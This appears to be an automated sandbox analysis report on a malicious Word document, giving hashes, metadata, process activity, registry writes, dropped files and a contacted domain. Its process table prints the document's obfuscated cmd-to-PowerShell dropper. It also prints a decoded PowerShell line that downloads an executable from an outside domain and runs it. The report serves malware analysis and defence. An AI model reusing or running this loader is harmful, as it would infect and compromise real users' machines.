| File name: | MARTICO_ITALY.doc |
| Full analysis: | https://app.any.run/tasks/0f426abf-e30b-4dac-b5aa-23ed285f15d4 |
| Verdict: | Malicious activity |
| Analysis date: | December 06, 2018, 09:43:36 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 3 21:30:00 2018, Last Saved Time/Date: Mon Dec 3 21:30:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 18, Security: 0 |
| MD5: | 1F59C72BF20F7292A09CB1887EFE1DFD |
| SHA1: | FEAD6B87D29AE5C6840AC7698565884E674FF21C |
| SHA256: | CF6602579C22146AB039A5729D93B4F913DEFA56174B914E5EA7815AB376507D |
| SSDEEP: | 1536:INVczHkD9icmT+FFd1+a91+IgyBSu8LSE3B:In/iKFP+IFBSuiSE3B |
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
| Title: | - |
|---|---|
| Subject: | - |
| Author: | - |
| Keywords: | - |
| Comments: | - |
| Template: | Normal.dotm |
| LastModifiedBy: | - |
| RevisionNumber: | 1 |
| Software: | Microsoft Office Word |
| TotalEditTime: | - |
| CreateDate: | 2018:12:03 21:30:00 |
| ModifyDate: | 2018:12:03 21:30:00 |
| Pages: | 1 |
| Words: | 3 |
| Characters: | 18 |
| Security: | None |
| CodePage: | Windows Cyrillic |
| Company: | - |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 20 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | - |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 416 | powershell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2872 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\MARTICO_ITALY.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3468 | c:\XbYKiWzkb\wjzEotZdpQBlTG\wvwNDbNcHZmq\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set qzN=pZC;Y(0'l[?a=v,QKGxW(zV'bWG=^<M]B?:-F1i`cNHG$xnl}4i+}8zn{(E,h(qic\S0tNR+aJ#PcN5p}o1l}\kx;]0Bkb(8aUhbe)d9r_k+bLCj;^&SC'.$2AXJzZJ$2ZjBI'$1d=NX$mLP,Kt;Rt\(u$%3c;5\PF0MYq(Y)sT?^|$pE( y^|^>m}4ReP?RtYlSIS]^&-USOe*unkm]Lo_LTv[UmnDi@I\9K{^>b- uM{)\kl0r4W08?H0^|F40]aq88z_ `uleil`ga%e-ST7 wB0h,Ibt%M'g)S_n0t)e6*HlpJ`.XCN)EXCFH\wqCvus 0#$_a^& ;KDmcqJeUzatSuvIj]d-N$Zt3RKe{VLGoYt(X6r(?;e %}\fst,IT(:;PK^>'Pk5Z%_sS^|oaoF9^>'n*a=#ICl],VifV9z^&,$jwa;Q/())j=F2gVqK.%s;pL$xA~ 0T],2NKpxyLKC$BAB?y$-:u(O~Qe7\qllRPiwqnFQHrdf}^&aWbKoC5Dlo1Nn5-=wd{ro@E\DT B.`YZQ9(Ot~yDYu(7$zxT{*;RyZ8=rmPutEDl{XEl)Kf@z=^<PB\7ZmgB[$^<cI _T;n~+vi@L3 .%5p-UzKV(AAT2E$17(shHh4#tc$9XaNIWe.Pmr/y+o2Egfg#;;OJo'W6)eMhzxgShe:4^<.qtA'bO`+o=^>qTbPzCOfz+}j$k$~+='x'OS^<\qY%'oP9+jQWp53OmJ=\eS`ttg)X:rtIvft_ns)]eo?I$WXA=nzIFk@^&qAzas-bY$Iom;Dj['@Y,z_A'h`@Dk([O'dvS=\/DI(+UH1#7alCI$U95;q34'51;99BV45^&$7}]{'Cy+ $g,=wkv j(hq%Gdz7IVzkJe$[?(;Wf ''b(J(-IR@'jEfn]'N.I=Sk:jG^|jz5W?wk`G${SU;;F?)9#^|'q%+@/l*'yT}( JEt@*ti4T)l(*Mp#./Sz$l.qE''nMmnrVik=_Ft*2d.F5A5c%^<k4ghmyfvy[wVg{^&4=q:,leh4?^>Dvp^>s}h@rsp^&Bc.f^&Kz97~ym+`uY]9iJa;d7V=/p0\Zo@;H{'AKS{M/M+-mo84oQC\c[^>P.I*Ne*^<thVa5rocAoX\Uc8w9yEr=s]3@pLkmy~kms/+F/.I9/6G-:YZKpXk{t]ZLtqe1hC7v', T=@A[z\@^|BxJ_msm)$}:C;_y t2UOn6rpeqC7ifZ$lr{GCJ:yb*38ewqHWe`G.O.)tJ?(eWG=N:zb Qn4t]phca};e[^|6jNl;bHR@o_4N-RN3w=T[ekW,nbSe=?dGQ]b^&tI$AYW(G$X)y;)Y/'L\.I?iem1^|uI;I2'f^|3=f_pTJA:l5\2Z%2/f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&for /L %7 in (1335,-4,3)do set sY=!sY!!qzN:~%7,1!&&if %7==3 echo !sY:*sY!=! |powershell -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3900 | C:\Windows\system32\cmd.exe /S /D /c" echo $ZlT='ImI';$YtQ=new-object Net.WebClient;$mBz='http://sypsycorhe.com/KHZ/diuyz.php?l=gymk5.tkn'.Split('@');$wzj='ERJ';$zzq = '749';$aHI='khz';$sqF=$env:temp+'\'+$zzq+'.exe';foreach($AKp in $mBz){try{$YtQ.DownloadFile($AKp, $sqF);$zil='oSZ';If ((Get-Item $sqF).length -ge 80000) {Invoke-Item $sqF;$tKm='ZZA';break;}}catch{}}$cFB='WQa'; " | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 4064 | CmD /V:O/C"set qzN=pZC;Y(0'l[?a=v,QKGxW(zV'bWG=^<M]B?:-F1i`cNHG$xnl}4i+}8zn{(E,h(qic\S0tNR+aJ#PcN5p}o1l}\kx;]0Bkb(8aUhbe)d9r_k+bLCj;^&SC'.$2AXJzZJ$2ZjBI'$1d=NX$mLP,Kt;Rt\(u$%3c;5\PF0MYq(Y)sT?^|$pE( y^|^>m}4ReP?RtYlSIS]^&-USOe*unkm]Lo_LTv[UmnDi@I\9K{^>b- uM{)\kl0r4W08?H0^|F40]aq88z_ `uleil`ga%e-ST7 wB0h,Ibt%M'g)S_n0t)e6*HlpJ`.XCN)EXCFH\wqCvus 0#$_a^& ;KDmcqJeUzatSuvIj]d-N$Zt3RKe{VLGoYt(X6r(?;e %}\fst,IT(:;PK^>'Pk5Z%_sS^|oaoF9^>'n*a=#ICl],VifV9z^&,$jwa;Q/())j=F2gVqK.%s;pL$xA~ 0T],2NKpxyLKC$BAB?y$-:u(O~Qe7\qllRPiwqnFQHrdf}^&aWbKoC5Dlo1Nn5-=wd{ro@E\DT B.`YZQ9(Ot~yDYu(7$zxT{*;RyZ8=rmPutEDl{XEl)Kf@z=^<PB\7ZmgB[$^<cI _T;n~+vi@L3 .%5p-UzKV(AAT2E$17(shHh4#tc$9XaNIWe.Pmr/y+o2Egfg#;;OJo'W6)eMhzxgShe:4^<.qtA'bO`+o=^>qTbPzCOfz+}j$k$~+='x'OS^<\qY%'oP9+jQWp53OmJ=\eS`ttg)X:rtIvft_ns)]eo?I$WXA=nzIFk@^&qAzas-bY$Iom;Dj['@Y,z_A'h`@Dk([O'dvS=\/DI(+UH1#7alCI$U95;q34'51;99BV45^&$7}]{'Cy+ $g,=wkv j(hq%Gdz7IVzkJe$[?(;Wf ''b(J(-IR@'jEfn]'N.I=Sk:jG^|jz5W?wk`G${SU;;F?)9#^|'q%+@/l*'yT}( JEt@*ti4T)l(*Mp#./Sz$l.qE''nMmnrVik=_Ft*2d.F5A5c%^<k4ghmyfvy[wVg{^&4=q:,leh4?^>Dvp^>s}h@rsp^&Bc.f^&Kz97~ym+`uY]9iJa;d7V=/p0\Zo@;H{'AKS{M/M+-mo84oQC\c[^>P.I*Ne*^<thVa5rocAoX\Uc8w9yEr=s]3@pLkmy~kms/+F/.I9/6G-:YZKpXk{t]ZLtqe1hC7v', T=@A[z\@^|BxJ_msm)$}:C;_y t2UOn6rpeqC7ifZ$lr{GCJ:yb*38ewqHWe`G.O.)tJ?(eWG=N:zb Qn4t]phca};e[^|6jNl;bHR@o_4N-RN3w=T[ekW,nbSe=?dGQ]b^&tI$AYW(G$X)y;)Y/'L\.I?iem1^|uI;I2'f^|3=f_pTJA:l5\2Z%2/f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&for /L %7 in (1335,-4,3)do set sY=!sY!!qzN:~%7,1!&&if %7==3 echo !sY:*sY!=! |powershell -" | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| (PID) Process: | (2872) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | wr$ |
Value: 77722400380B0000010000000000000000000000 | |||
| (PID) Process: | (2872) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (2872) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (2872) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1300627486 | |||
| (PID) Process: | (2872) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1300627600 | |||
| (PID) Process: | (2872) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1300627601 | |||
| (PID) Process: | (2872) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: 380B00000219B538488DD40100000000 | |||
| (PID) Process: | (2872) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | xu$ |
Value: 78752400380B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (2872) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | xu$ |
Value: 78752400380B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (2872) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2872 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR96D7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 416 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZQPAWK6269AWWP7DO0H.temp | — | |
MD5:— | SHA256:— | |||
| 2872 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:— | SHA256:— | |||
| 416 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19abe6.TMP | binary | |
MD5:— | SHA256:— | |||
| 2872 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\MARTICO_ITALY.doc.LNK | lnk | |
MD5:— | SHA256:— | |||
| 2872 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:— | SHA256:— | |||
| 2872 | WINWORD.EXE | C:\Users\admin\Desktop\~$RTICO_ITALY.doc | pgc | |
MD5:— | SHA256:— | |||
| 416 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
Domain | IP | Reputation |
|---|---|---|
sypsycorhe.com |
| unknown |